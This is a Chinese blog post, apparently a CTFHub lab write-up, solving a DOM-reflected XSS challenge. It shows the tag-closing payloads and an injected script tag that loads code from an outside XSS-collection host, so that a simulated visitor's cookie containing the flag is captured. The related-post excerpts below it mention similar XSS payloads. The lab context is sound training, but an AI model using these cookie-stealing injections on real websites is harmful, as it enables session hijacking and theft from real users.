CTFHUB—XSS—DOM反射

于 2024-08-05 20:00:00 发布
阅读量231 收藏 3
点赞数 3
分类专栏: CTFHUB技能树 文章标签: javascript 安全 网络安全 web安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/140845091
版权

开启题目

输入以下语句测试一下,发现页面没有弹出窗口显示“flag”

<script>alert("flag")</script>

查看页面源代码, 尝试闭合标签

使用下面代码闭合,然后发现闭合成功了

'</script><script>alert("flag")</script>

这里我们使用 TLXSS 平台(XSS平台-XSS测试网站-仅用于安全免费测试,没有账号可以注册一个,用户名最好是英文),点击创建项目,项目名称随便起

在“我的的项目”点击刚才创建的项目,再点击右上角的查看配置源码

这里选择第二个

拼接到闭合后面,放到第一个输入框提交

'></script><sCRiPt sRC=//xs.pe/wEZ></sCrIpT>

然后把 URL 放到第二个输入框模拟用户访问,发送

然后回到 TLXSS 平台的项目页面查看 cookie 参数是否传到本地服务器中,最后在 cookie 返回值发现了 flag

燕雀安知鸿鹄之志哉.
关注
专栏目录
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7197
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
xss跨站攻击脚本概述
xu_1234567的博客
10-28 339
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久型跨站(存储型xss ):最直接的危害类型,跨站代码存储在服务器(数据库) (2)非持久型跨站(反射xss):反射型跨站脚本漏洞,最普
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 2459
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
CTFHub XSS DOM反射 WriteUp
柠檬i的博客
07-04 2217
查看前端代码,构造语句闭合标签,以此完成xss攻击
CTFHub——XSS
2302_79119987的博客
03-28 1244
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHub XSS DOM 跳转
qq_48368964的博客
08-02 462
当你将类似于 location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。在这种情况下,浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析,然后执行它。发现可以 老步骤 去xssaq.com上 复制一个 src来 接受 flag。直接在网页url后面跟上代码测试反弹。
CTFHub | 反射
尼泊罗河伯的博客
12-16 456
检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。一般情况下,在一个网页中有一个输入框并且带有一个提交表单的,就有可能含有 XSS 漏洞。
CTFHub | DOM反射
尼泊罗河伯的博客
01-31 636
查看网页内容发现一个输入框和一个提交表单。第二个输入框用于模拟用户点击访问目标网页的一个过程。
CTFHUB-WEB-XSS-DOM反射
weixin_49539962的博客
08-08 341
但是在输入xss代码是要注意,我们可控的是“CTFHUB is very niubility”这句话,需要把这句话闭合后插入xss代码才能生效。和反射型是一样的,使用xss platform。
反射xss攻击流量数据包
07-18
反射xss攻击流量数据包
CTFhub XSS技能树DOM
07-29
CTFhub 中,XSS 技能树涵盖了多个与 XSS 相关的知识点和攻击场景。以下是一些可能包含在 XSS 技能树中的主题: 1. XSS 基础知识:深入理解 XSS 的原理、类型和危害。 2. 攻击载体:了解常见的 XSS 攻击载体,如 ...
CTFhub XSS技能树
07-28
XSS(跨站脚本攻击)技能树是一个由CTFhub创建的学习路径,旨在帮助初学者逐步学习和掌握XSS攻击的技术。以下是XSS技能树的一般路径: 1. 基础知识: - 学习什么是XSS攻击以及它的原理和分类。 - 了解XSS攻击的...
ctfhub技能树xss
07-28
2. XSS攻击类型:学习常见的XSS攻击类型,包括反射型、存储型和DOMXSS。 3. XSS攻击场景:了解XSS攻击在不同的Web应用场景中的实践方法,如评论框、搜索框等。 4. XSS防御措施:学习如何预防和防御XSS攻击,包括...
ctfhubxss
小宇的web博客
05-22 1680
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
CTFHub技能树webXSS
wzhwzh123321的博客
02-26 1614
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射
CTFHUB WEB
m0_62566376的博客
07-17 817
ctfhub web笔记
2.CTFhub技能树 web前置技能 http协议 302跳转
FFFFFFMVPhat的博客
11-15 1771
这题没有思路,看着别人的解析进行的做题 首先先了解什么是301跳转什么是302跳转,以及http重定向 (在http 1.0规范中有2个重定向——301和302,在http 1.1规范中存在4个重定向——301、302、303和307。) 301:永久重定向,如我们访问知乎 - 有问题,就会有答案http://www.zhihu.com会跳转到 知乎 - 有问题,就会有答案https://www.zhihu.com(我之前纠结为什么我输入改包时referer:https和http为何都可以发...
CTFHUB-XSS-反射
最新发布
weixin_68416970的博客
08-03 529
CTFHUB技能树、XSS反射型的详细教程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值